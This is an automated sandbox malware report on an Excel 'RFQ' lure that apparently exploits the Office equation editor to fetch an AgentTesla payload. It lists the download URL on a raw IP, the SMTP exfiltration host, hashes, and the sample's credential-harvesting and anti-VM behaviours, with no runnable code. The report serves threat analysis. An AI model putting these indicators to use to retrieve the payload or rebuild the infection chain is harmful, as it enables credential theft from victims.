                      behaviorgraph top1 signatures2 2 Behavior Graph ID: 435319 Sample: Request for Quotation (RFQ).xlsx Startdate: 16/06/2021 Architecture: WINDOWS Score: 100 31 Found malware configuration 2->31 33 Multi AV Scanner detection for submitted file 2->33 35 Yara detected AgentTesla 2->35 37 11 other signatures 2->37 7 EQNEDT32.EXE 12 2->7         started        12 EXCEL.EXE 37 25 2->12         started        process3 dnsIp4 29 192.227.228.121, 49165, 80 AS-COLOCROSSINGUS United States 7->29 21 C:\Users\user\AppData\Local\...\dan[1].exe, PE32 7->21 dropped 23 C:\Users\Public\vbc.exe, PE32 7->23 dropped 47 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 7->47 14 vbc.exe 7->14         started        25 C:\...\~$Request for Quotation (RFQ).xlsx, data 12->25 dropped file5 signatures6 process7 signatures8 49 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 14->49 51 Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines) 14->51 53 Injects a PE file into a foreign processes 14->53 17 vbc.exe 4 14->17         started        process9 dnsIp10 27 us2.smtp.mailhostbox.com 208.91.198.143, 49166, 587 PUBLIC-DOMAIN-REGISTRYUS United States 17->27 39 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 17->39 41 Tries to steal Mail credentials (via file access) 17->41 43 Tries to harvest and steal ftp login credentials 17->43 45 Tries to harvest and steal browser information (history, passwords, etc) 17->45 signatures11

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      Request for Quotation (RFQ).xlsx31%MetadefenderBrowse
                      Request for Quotation (RFQ).xlsx35%ReversingLabsDocument-Office.Exploit.Heuristic

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

                      SourceDetectionScannerLabelLinkDownload
                      5.2.vbc.exe.400000.1.unpack100%AviraHEUR/AGEN.1138205Download File

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#0%URL Reputationsafe
                      http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#0%URL Reputationsafe
                      http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#0%URL Reputationsafe
                      http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
                      http://DynDns.comDynDNS0%URL Reputationsafe
                      http://DynDns.comDynDNS0%URL Reputationsafe
                      http://DynDns.comDynDNS0%URL Reputationsafe
                      http://DPosyL.com0%Avira URL Cloudsafe
                      https://sectigo.com/CPS00%URL Reputationsafe
                      https://sectigo.com/CPS00%URL Reputationsafe
                      https://sectigo.com/CPS00%URL Reputationsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
                      http://ocsp.entrust.net030%URL Reputationsafe
                      http://ocsp.entrust.net030%URL Reputationsafe
                      http://ocsp.entrust.net030%URL Reputationsafe
                      http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
                      http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
                      http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
                      http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
                      http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
                      http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
                      http://MzDfYxjI5Zul5lFh.org0%Avira URL Cloudsafe
                      http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
                      http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
                      http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
                      http://ocsp.sectigo.com0A0%URL Reputationsafe
                      http://ocsp.sectigo.com0A0%URL Reputationsafe
                      http://ocsp.sectigo.com0A0%URL Reputationsafe
                      http://www.%s.comPA0%URL Reputationsafe
                      http://www.%s.comPA0%URL Reputationsafe
                      http://www.%s.comPA0%URL Reputationsafe
                      http://ocsp.entrust.net0D0%URL Reputationsafe
                      http://ocsp.entrust.net0D0%URL Reputationsafe
                      http://ocsp.entrust.net0D0%URL Reputationsafe
                      http://192.227.228.121/dan.exe0%Avira URL Cloudsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
                      http://servername/isapibackend.dll0%Avira URL Cloudsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      us2.smtp.mailhostbox.com
                      208.91.198.143
                      truefalse
                        high

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        http://192.227.228.121/dan.exetrue
                        • Avira URL Cloud: safe
                        unknown

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#vbc.exe, 00000005.00000002.2352657188.0000000005150000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        unknown
                        http://127.0.0.1:HTTP/1.1vbc.exe, 00000005.00000002.2351315901.0000000002291000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        low
                        http://DynDns.comDynDNSvbc.exe, 00000005.00000002.2351315901.0000000002291000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        unknown
                        http://DPosyL.comvbc.exe, 00000005.00000002.2351315901.0000000002291000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://sectigo.com/CPS0vbc.exe, 00000005.00000002.2352657188.0000000005150000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        unknown
                        http://crl.entrust.net/server1.crl0vbc.exe, 00000005.00000002.2352657188.0000000005150000.00000004.00000001.sdmpfalse
                          high
                          http://us2.smtp.mailhostbox.comvbc.exe, 00000005.00000002.2351519000.00000000023CA000.00000004.00000001.sdmpfalse
                            high
                            https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%havbc.exe, 00000005.00000002.2351315901.0000000002291000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            unknown
                            http://ocsp.entrust.net03vbc.exe, 00000005.00000002.2352657188.0000000005150000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            unknown
                            http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0vbc.exe, 00000005.00000002.2352657188.0000000005150000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            unknown
                            http://www.diginotar.nl/cps/pkioverheid0vbc.exe, 00000005.00000002.2352657188.0000000005150000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            unknown
                            https://github.com/georgw777/MediaManagervbc.exefalse
                              high
                              https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.cssvbc.exe, 00000004.00000002.2140372454.00000000021B6000.00000004.00000001.sdmpfalse
                                high
                                https://github.com/georgw777/MediaManager;https://github.com/georgw777/vbc.exe, 00000004.00000002.2140067412.0000000000902000.00000020.00020000.sdmp, vbc.exe, 00000005.00000000.2139065825.0000000000902000.00000020.00020000.sdmp, vbc.exe.2.drfalse
                                  high
                                  http://MzDfYxjI5Zul5lFh.orgvbc.exe, 00000005.00000002.2351581799.00000000023F0000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://crl.pkioverheid.nl/DomOvLatestCRL.crl0vbc.exe, 00000005.00000002.2352657188.0000000005150000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.vbc.exe, 00000005.00000002.2353179521.0000000005CB0000.00000002.00000001.sdmpfalse
                                    high
                                    http://www.day.com/dam/1.06A8387D5.emf.0.drfalse
                                      high
                                      http://ocsp.sectigo.com0Avbc.exe, 00000005.00000002.2352657188.0000000005150000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      unknown
                                      http://www.%s.comPAvbc.exe, 00000005.00000002.2353179521.0000000005CB0000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      low
                                      http://ocsp.entrust.net0Dvbc.exe, 00000005.00000002.2352657188.0000000005150000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      unknown
                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namevbc.exe, 00000004.00000002.2140354304.0000000002191000.00000004.00000001.sdmpfalse
                                        high
                                        https://secure.comodo.com/CPS0vbc.exe, 00000005.00000002.2352657188.0000000005150000.00000004.00000001.sdmpfalse
                                          high
                                          https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zipvbc.exe, 00000004.00000002.2140883462.0000000003199000.00000004.00000001.sdmp, vbc.exe, 00000005.00000002.2350857506.0000000000402000.00000040.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          unknown
                                          http://servername/isapibackend.dllvbc.exe, 00000005.00000002.2354088257.0000000006E60000.00000002.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          low
                                          http://crl.entrust.net/2048ca.crl0vbc.exe, 00000005.00000002.2352657188.0000000005150000.00000004.00000001.sdmpfalse
                                            high
                                            https://github.com/georgw777/vbc.exefalse
                                              high

                                              Contacted IPs

                                              • No. of IPs < 25%
                                              • 25% < No. of IPs < 50%
                                              • 50% < No. of IPs < 75%
                                              • 75% < No. of IPs

                                              Public

                                              IPDomainCountryFlagASNASN NameMalicious
                                              208.91.198.143
                                              us2.smtp.mailhostbox.comUnited States
                                              394695PUBLIC-DOMAIN-REGISTRYUSfalse
                                              192.227.228.121
                                              unknownUnited States
                                              36352AS-COLOCROSSINGUStrue

                                              General Information

                                              Joe Sandbox Version:32.0.0 Black Diamond
                                              Analysis ID:435319
                                              Start date:16.06.2021
                                              Start time:12:13:16
                                              Joe Sandbox Product:CloudBasic
                                              Overall analysis duration:0h 8m 25s
                                              Hypervisor based Inspection enabled:false
                                              Report type:light
                                              Sample file name:Request for Quotation (RFQ).xlsx
                                              Cookbook file name:defaultwindowsofficecookbook.jbs
                                              Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                              Number of analysed new started processes analysed:6
                                              Number of new started drivers analysed:0
                                              Number of existing processes analysed:0
                                              Number of existing drivers analysed:0
                                              Number of injected processes analysed:0
                                              Technologies:
                                              • HCA enabled
                                              • EGA enabled
                                              • HDC enabled
                                              • AMSI enabled
                                              Analysis Mode:default
                                              Analysis stop reason:Timeout
                                              Detection:MAL
                                              Classification:mal100.troj.spyw.expl.evad.winXLSX@6/18@1/2
                                              EGA Information:Failed
                                              HDC Information:
                                              • Successful, ratio: 2.4% (good quality ratio 1.7%)
                                              • Quality average: 55.4%
                                              • Quality standard deviation: 40.9%
                                              HCA Information:
                                              • Successful, ratio: 93%
                                              • Number of executed functions: 0
                                              • Number of non-executed functions: 0
                                              Cookbook Comments:
                                              • Adjust boot time
                                              • Enable AMSI
                                              • Found application associated with file extension: .xlsx
                                              • Found Word or Excel or PowerPoint or XPS Viewer
                                              • Attach to Office via COM
                                              • Scroll down
                                              • Close Viewer
                                              Warnings:
                                              Show All
                                              • Exclude process from analysis (whitelisted): dllhost.exe
                                              • TCP Packets have been reduced to 100
                                              • Excluded IPs from analysis (whitelisted): 205.185.216.10, 205.185.216.42, 173.222.108.226, 173.222.108.210
                                              • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, audownload.windowsupdate.nsatc.net, au.download.windowsupdate.com.hwcdn.net, ctldl.windowsupdate.com, cds.d2s7q6s2.hwcdn.net, a767.dscg3.akamai.net, au-bg-shim.trafficmanager.net
                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                              • VT rate limit hit for: /opt/package/joesandbox/database/analysis/435319/sample/Request for Quotation (RFQ).xlsx

                                              Simulations

                                              Behavior and APIs

                                              TimeTypeDescription
                                              12:14:01API Interceptor59x Sleep call for process: EQNEDT32.EXE modified
                                              12:14:03API Interceptor960x Sleep call for process: vbc.exe modified

                                              Joe Sandbox View / Context

                                              IPs

                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                              208.91.198.143RFQ-566888787.exeGet hashmaliciousBrowse
                                                mRfakcKuzY.exeGet hashmaliciousBrowse
                                                  New Inquiry 20216013.exeGet hashmaliciousBrowse
                                                    xZMUq36tQv.exeGet hashmaliciousBrowse
                                                      QUOTE.exeGet hashmaliciousBrowse
                                                        ORGINAL SHIPPING DOCUMENT.exeGet hashmaliciousBrowse
                                                          dan.exeGet hashmaliciousBrowse
                                                            PO#61420.exeGet hashmaliciousBrowse
                                                              Request.exeGet hashmaliciousBrowse
                                                                Payment Advice.exeGet hashmaliciousBrowse
                                                                  Recibo de banco.exeGet hashmaliciousBrowse
                                                                    KC8ZMn81JC.exeGet hashmaliciousBrowse
                                                                      Urgent Contract Order GH7856648,pdf.exeGet hashmaliciousBrowse
                                                                        NEW ORDER 112888#.exeGet hashmaliciousBrowse
                                                                          SecuriteInfo.com.MachineLearning.Anomalous.97.15449.exeGet hashmaliciousBrowse
                                                                            lFccIK78FD.exeGet hashmaliciousBrowse
                                                                              MOQ FOB ORDER.exeGet hashmaliciousBrowse
                                                                                JK6Ul6IKioPWJ6Y.exeGet hashmaliciousBrowse
                                                                                  SecuriteInfo.com.Trojan.PackedNET.832.15445.exeGet hashmaliciousBrowse
                                                                                    Urgent Contract Order GH7856648,pdf.exeGet hashmaliciousBrowse
                                                                                      192.227.228.121pago.xlsxGet hashmaliciousBrowse
                                                                                      • 192.227.228.121/ewak.exe
                                                                                      order 4806125050.xlsxGet hashmaliciousBrowse
                                                                                      • 192.227.228.121/mpa.exe
                                                                                      PO -TXGU5022187.xlsxGet hashmaliciousBrowse
                                                                                      • 192.227.228.121/razi.exe
                                                                                      Naro#U010dite 5039066002128.xlsxGet hashmaliciousBrowse
                                                                                      • 192.227.228.121/ewaa.exe
                                                                                      e#U03c2.xlsxGet hashmaliciousBrowse
                                                                                      • 192.227.228.121/ewa.exe

                                                                                      Domains

                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                      us2.smtp.mailhostbox.com#U65b0#U8a02#U55ae_WJO-001.pdf.exeGet hashmaliciousBrowse
                                                                                      • 208.91.199.223
                                                                                      Yeni sipari#U015f _WJO-001,pdf.exeGet hashmaliciousBrowse
                                                                                      • 208.91.199.224
                                                                                      F27XTbEl5F.exeGet hashmaliciousBrowse
                                                                                      • 208.91.199.225
                                                                                      RFQ-566888787.exeGet hashmaliciousBrowse
                                                                                      • 208.91.198.143
                                                                                      RDLIBUzalu.exeGet hashmaliciousBrowse
                                                                                      • 208.91.199.225
                                                                                      doc202124050032.exeGet hashmaliciousBrowse
                                                                                      • 208.91.199.225
                                                                                      mRfakcKuzY.exeGet hashmaliciousBrowse
                                                                                      • 208.91.198.143
                                                                                      New Inquiry 20216013.exeGet hashmaliciousBrowse
                                                                                      • 208.91.199.223
                                                                                      xZMUq36tQv.exeGet hashmaliciousBrowse
                                                                                      • 208.91.198.143
                                                                                      QUOTE.exeGet hashmaliciousBrowse
                                                                                      • 208.91.198.143
                                                                                      K4e3iPVjUU.exeGet hashmaliciousBrowse
                                                                                      • 208.91.199.223
                                                                                      ORGINAL SHIPPING DOCUMENT.exeGet hashmaliciousBrowse
                                                                                      • 208.91.198.143
                                                                                      SugVz0cZPXagh2b.exeGet hashmaliciousBrowse
                                                                                      • 208.91.199.224
                                                                                      dan.exeGet hashmaliciousBrowse
                                                                                      • 208.91.198.143
                                                                                      PO#61420.exeGet hashmaliciousBrowse
                                                                                      • 208.91.198.143
                                                                                      lista di spesa&fattura_pdf________________________________.exeGet hashmaliciousBrowse
                                                                                      • 208.91.199.225
                                                                                      SX-L21182 #U9ece#U5df4#U5ae9EST new order.xlsxGet hashmaliciousBrowse
                                                                                      • 208.91.198.143
                                                                                      Request.exeGet hashmaliciousBrowse
                                                                                      • 208.91.199.224
                                                                                      fpccHIAWusmio6a.exeGet hashmaliciousBrowse
                                                                                      • 208.91.199.225
                                                                                      Shipping document AWB 80258723268765pdf.exeGet hashmaliciousBrowse
                                                                                      • 208.91.199.225

                                                                                      ASN

                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                      PUBLIC-DOMAIN-REGISTRYUSPoczta Polska Informacje o transakcjach2021.exeGet hashmaliciousBrowse
                                                                                      • 103.50.162.153
                                                                                      #U65b0#U8a02#U55ae_WJO-001.pdf.exeGet hashmaliciousBrowse
                                                                                      • 208.91.199.223
                                                                                      SWIFT Msg of USD 78,000.exeGet hashmaliciousBrowse
                                                                                      • 43.225.55.205
                                                                                      Yeni sipari#U015f _WJO-001,pdf.exeGet hashmaliciousBrowse
                                                                                      • 208.91.199.224
                                                                                      F27XTbEl5F.exeGet hashmaliciousBrowse
                                                                                      • 208.91.199.225
                                                                                      hG6FzLXtsf.xlsGet hashmaliciousBrowse
                                                                                      • 119.18.54.94
                                                                                      RFQ-566888787.exeGet hashmaliciousBrowse
                                                                                      • 208.91.199.225
                                                                                      RDLIBUzalu.exeGet hashmaliciousBrowse
                                                                                      • 208.91.199.225
                                                                                      P0fhg2Duqa.xlsGet hashmaliciousBrowse
                                                                                      • 207.174.213.181
                                                                                      doc202124050032.exeGet hashmaliciousBrowse
                                                                                      • 208.91.199.225
                                                                                      mRfakcKuzY.exeGet hashmaliciousBrowse
                                                                                      • 208.91.198.143
                                                                                      New Inquiry 20216013.exeGet hashmaliciousBrowse
                                                                                      • 208.91.199.223
                                                                                      xZMUq36tQv.exeGet hashmaliciousBrowse
                                                                                      • 208.91.199.225
                                                                                      tender-461487493.xlsbGet hashmaliciousBrowse
                                                                                      • 103.53.42.17
                                                                                      QUOTE.exeGet hashmaliciousBrowse
                                                                                      • 208.91.198.143
                                                                                      K4e3iPVjUU.exeGet hashmaliciousBrowse
                                                                                      • 208.91.199.223
                                                                                      ORGINAL SHIPPING DOCUMENT.exeGet hashmaliciousBrowse
                                                                                      • 208.91.198.143
                                                                                      SugVz0cZPXagh2b.exeGet hashmaliciousBrowse
                                                                                      • 208.91.199.224
                                                                                      dan.exeGet hashmaliciousBrowse
                                                                                      • 208.91.198.143
                                                                                      PO#61420.exeGet hashmaliciousBrowse
                                                                                      • 208.91.198.143

                                                                                      JA3 Fingerprints

                                                                                      No context

                                                                                      Dropped Files

                                                                                      No context

                                                                                      Created / dropped Files

                                                                                      C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
                                                                                      Process:C:\Users\Public\vbc.exe
                                                                                      File Type:Microsoft Cabinet archive data, 60080 bytes, 1 file
                                                                                      Category:dropped
                                                                                      Size (bytes):60080
                                                                                      Entropy (8bit):7.995256720209506
                                                                                      Encrypted:true
                                                                                      SSDEEP:768:O78wIEbt8Rc7GHyP7zpxeiB9jTs6cX8ENclXVbFYYDceSKZyhRhbzfgtEnz9BPNZ:A8Rc7GHyhUHsVNPOlhbz2E5BPNiUu+g4
                                                                                      MD5:6045BACCF49E1EBA0E674945311A06E6
                                                                                      SHA1:379C6234849EECEDE26FAD192C2EE59E0F0221CB
                                                                                      SHA-256:65830A65CB913BEE83258E4AC3E140FAF131E7EB084D39F7020C7ACC825B0A58
                                                                                      SHA-512:DA32AF6A730884E73956E4EB6BFF61A1326B3EF8BA0A213B5B4AAD6DE4FBD471B3550B6AC2110F1D0B2091E33C70D44E498F897376F8E1998B1D2AFAC789ABEB
                                                                                      Malicious:false
                                                                                      Reputation:moderate, very likely benign file
                                                                                      Preview: MSCF............,...................I........d.........R9b .authroot.stl.3..).4..CK..8T....c_.d....A.K...].M$[v.4.)7-.%.QIR..$t)Kd.-[..T\{..ne.....{..<.......Ab.<..X....sb.....e........dbu.3...0........X..00&Z....C...p0.}..2..0m.}..Cj.9U..J.j.Y...#.L..\X..O.,...,.qu..]..(B.nE~Q...)..Gcx.....}...f....zw.a..9+[.<0.'..2 .s..ya..J......wd....OO!.s....`.WA...F6._f....6...g..2..7.$,....X.k..&...E...g.....>uv."..!......xc......C..?....P0$.Y..?u....Z0.g3.>W0&.y.(....].`>... ..R.q..wg*X......qB!.B....Z.4..>.R.M..0.8...=.8..Ya.s.......add..)..w.4.&.z...2.&74.5]..w.j.._iK..||[.w.M.!<-.}%.C<tDX5\s._..I..*..nb.....GCQ.V..r..Y.............q...0..V)Tu>.Z..r...I...<.R{Ac..x^. .<A........|.{.....Q...&....X..C$....e9.:..vI..x.R4...L......%g...<..}'{....E8Sl...E".h...*.........ItVs.K......3.9.l..`D..e.i`....y...,..5....aSs`..W...d...t.J..]....'u3..d]7..=e....[R!:........Q.%..@........ga.v.~..q....{.!N.b]x..Zx.../;#}.f.)k.c9..{rmPt..z5.m=..q..%.D#<+Ex....1|.._F.
                                                                                      C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
                                                                                      Process:C:\Users\Public\vbc.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):328
                                                                                      Entropy (8bit):3.107650340985951
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:kKn3e8N+SkQlPlEGYRMY9z+4KlDA3RUeWlK1MMx:P38kPlE99SNxAhUe3OMx
                                                                                      MD5:B55153CD3118FCB84E43CFF2DE69853A
                                                                                      SHA1:16F4420C0675672CBF2FCEEB8141F0B60AA8190C
                                                                                      SHA-256:276AA084B48D396865C3AD7DEA8A297553A3567BC4B3D05619AD84B181F1B7C6
                                                                                      SHA-512:012A13EF743BECE71B4A7293F3BFFC74DC98E2F2DD0F3FED6311AA6337E135CB0D9BA5942A80C5052C721BEDCD9082324639849CC58ED91D77B228CC1356FF1E
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview: p...... ..........v..c..(....................................................... ............L......&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.9.0.e.6.c.f.e.3.4.c.d.7.1.:.0."...
                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\dan[1].exe
                                                                                      Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                      Category:downloaded
                                                                                      Size (bytes):860672
                                                                                      Entropy (8bit):7.64738851637245
                                                                                      Encrypted:false
                                                                                      SSDEEP:12288:lzlgfvquwaHp/S4RxwD4jvcQ8MfHVQViTa7zfl+D6YtW0E:llaquPHpK4R2cj1eVbHfl30
                                                                                      MD5:E123306FCC7FD3C3BDA8993B4F6C43A2
                                                                                      SHA1:B9247EC8B7158C490369961D0E5ABEE45C305C9D
                                                                                      SHA-256:AAB5F4C72AFC1C8F1BEACB75EB3FA27DFD18E6D1E58E6A0C9F28222550C30AF7
                                                                                      SHA-512:DFD7602656D7E5B3B31360D7A200457502867EEC2ED673288DA882136051A6D1376B2741354B807989E5A298BBB370C54D71573DA82A51C55DC639EBF5B256BB
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      IE Cache URL:http://192.227.228.121/dan.exe
                                                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...`c.`.....................F......N.... ........@.. ....................................@.....................................K........B...................`....................................................... ............... ..H............text...T.... ...................... ..`.rsrc....B.......D..................@..@.reloc.......`....... ..............@..B................0.......H........'..H...........H,..k...........................................j+.&.(....(....(.....o....*..0..........+.&.+.&. ....8E.....(.... ....(....:/...8*.....(.... ....8......(....82... ............E....................1...........H...8,...& ....8......(....(....(....9....& ....8......(.... ....(....:....&*...V+.&..(....(....(....*..V+.&..(....(....(....*...+.&..*..+.&..*.J+.&.........(....*.J+.&.........(....*.J+.&.........(....*.J+.&.........(....*..+.&..(....*:+.&.....o .
                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1499C3D2.png
                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                      File Type:PNG image data, 476 x 244, 8-bit/color RGB, non-interlaced
                                                                                      Category:dropped
                                                                                      Size (bytes):49744
                                                                                      Entropy (8bit):7.99056926749243
                                                                                      Encrypted:true
                                                                                      SSDEEP:768:wnuJ6p14x3egT1LYye1wBiPaaBsZbkCev17dGOhRkJjsv+gZB/UcVaxZJ2LEz:Yfp1UeWNYF1UiPm+/q1sxZB/ZS
                                                                                      MD5:63A6CB15B2B8ECD64F1158F5C8FBDCC8
                                                                                      SHA1:8783B949B93383C2A5AF7369C6EEB9D5DD7A56F6
                                                                                      SHA-256:AEA49B54BA0E46F19E04BB883DA311518AF3711132E39D3AF143833920CDD232
                                                                                      SHA-512:BB42A40E6EADF558C2AAE82F5FB60B8D3AC06E669F41B46FCBE65028F02B2E63491DB40E1C6F1B21A830E72EE52586B83A24A055A06C2CCC2D1207C2D5AD6B45
                                                                                      Malicious:false
                                                                                      Reputation:moderate, very likely benign file
                                                                                      Preview: .PNG........IHDR..............I.M....IDATx....T.]...G.;..nuww7.s...U..K......Ih....q!i...K....t.'k.W..i..>.......B.....E.0....f.a.....e....++...P..|..^...L.S}r:..............sM....p..p-..y]...t7'.D)....../...k....pzos.......6;,..H.....U..a..9..1...$......*.kI<..\F...$.E....?[B(.9.....H..!.....0AV..g.m...23..C..g(.%...6..>.O.r...L..t1.Q-.bE......)........|i ..."....V.g.\.G..p..p.X[.....*%hyt...@..J...~.p.....|..>...~.`..E_...*.iU.G...i.O..r6...iV.....@..........Jte...5Q.P.v;..B.C...m......0.N......q...b.....Q...c.moT.e6OB...p.v"...."........9..G....B}...../m...0g...8......6.$.$]p...9.....Z.a.sr.;B.a....m...>...b..B..K...{...+w?....B3...2...>.......1..-.'.l.p........L....\.K..P.q......?>..fd.`w*..y..|y..,.....i..'&.?.....).e.D ?.06......U.%.2t........6.:..D.B....+~.....M%".fG]b\.[........1....".......GC6.....J.+......r.a...ieZ..j.Y...3..Q*m.r.urb.5@.e.v@@....gsb.{q-..3j........s.f.|8s$p.?3H......0`..6)...bD....^..+....9..;$...W::.jBH..!tK
                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\21A7353E.jpeg
                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                      File Type:gd-jpeg v1.0 (using IJG JPEG v80), quality = 90", baseline, precision 8, 700x990, frames 3
                                                                                      Category:dropped
                                                                                      Size (bytes):48770
                                                                                      Entropy (8bit):7.801842363879827
                                                                                      Encrypted:false
                                                                                      SSDEEP:768:uLgWImQ6AMqTeyjskbJeYnriZvApugsiKi7iszQ2rvBZzmFz3/soBqZhsglgDQPT:uLgY4MqTeywVYr+0ugbDTzQ27A3UXsgf
                                                                                      MD5:AA7A56E6A97FFA9390DA10A2EC0C5805
                                                                                      SHA1:200A6D7ED9F485DD5A7B9D79B596DE3ECEBD834A
                                                                                      SHA-256:56B1EDECC9A282A9FAAFD95D4D9844608B1AE5CCC8731F34F8B30B3825734974
                                                                                      SHA-512:A532FE4C52FED46919003A96B882AE6F7C70A3197AA57BD1E6E917F766729F7C9C1261C36F082FBE891852D083EDB2B5A34B0A325B7C1D96D6E58B0BED6C5782
                                                                                      Malicious:false
                                                                                      Reputation:high, very likely benign file
